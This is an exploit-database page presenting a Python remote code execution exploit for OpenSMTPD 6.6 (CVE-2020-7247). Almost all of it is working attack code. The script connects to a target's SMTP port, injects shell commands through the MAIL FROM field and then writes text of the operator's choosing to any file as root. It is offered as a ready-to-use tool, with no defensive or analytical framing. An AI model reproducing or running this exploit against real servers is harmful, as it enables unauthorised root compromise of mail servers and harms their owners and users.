[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

OpenBSD OpenSMTPD 6.6 Remote Code Execution Exploit

Author
Tobias Marcotto
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-36078
Category
remote exploits
Date add
07-04-2021
CVE
CVE-2020-7247
Platform
openbsd
# Exploit Title: OpenBSD OpenSMTPD Remote Code Execution Vulnerability
# Exploit Author: Tobias Marcotto
# Tested on: Kali Linux x64
# Version: 6.6
# Description: smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.
# CVE : CVE-2020-7247


*********************************************************************************************************


import socket, time
import sys

HOST = input("what is the ip address of the host?: ") 
PORT = 25              # The same port as used by the server
s = None

writeto = input("Which file do you want to write to?: ")#raw inputen
writewhat = input("What do you want to write to the file?: ")
payload = b"""\r\n
#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n 
#c\r\n
#d\r\n
echo '"""+writewhat.encode()+b"""' > """+writeto.encode()+b"""
.
"""

for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
    af, socktype, proto, canonname, sa = res
    try:
        s = socket.socket(af, socktype, proto)
    except OSError as msg:
        s = None
        continue
    try:
        s.connect(sa)
    except OSError as msg:
        s.close()
        s = None
        continue
    break
if s is None:
    print('could not open socket')
    sys.exit(1)
with s:
  data = s.recv(1024)
  print('Received', repr(data))
  time.sleep(1)
  print('sending')
  s.send(b"helo test.com\r\n")
  data = s.recv(1024)
  print('Received', repr(data))
  s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
  time.sleep(1)
  data = s.recv(1024)
  print('Received', repr(data))
  s.send(b"RCPT TO:<root>\r\n")
  data = s.recv(1024)
  print('Received', repr(data))
  s.send(b"DATA\r\n")
  data = s.recv(1024)
  print('Received', repr(data))
  s.send(payload)
  data = s.recv(1024)
  print('Received', repr(data))
  s.send(b"QUIT\r\n")
  data = s.recv(1024)
  print('Received', repr(data))
print("done")
s.close()

#  0day.today [2024-11-15]  #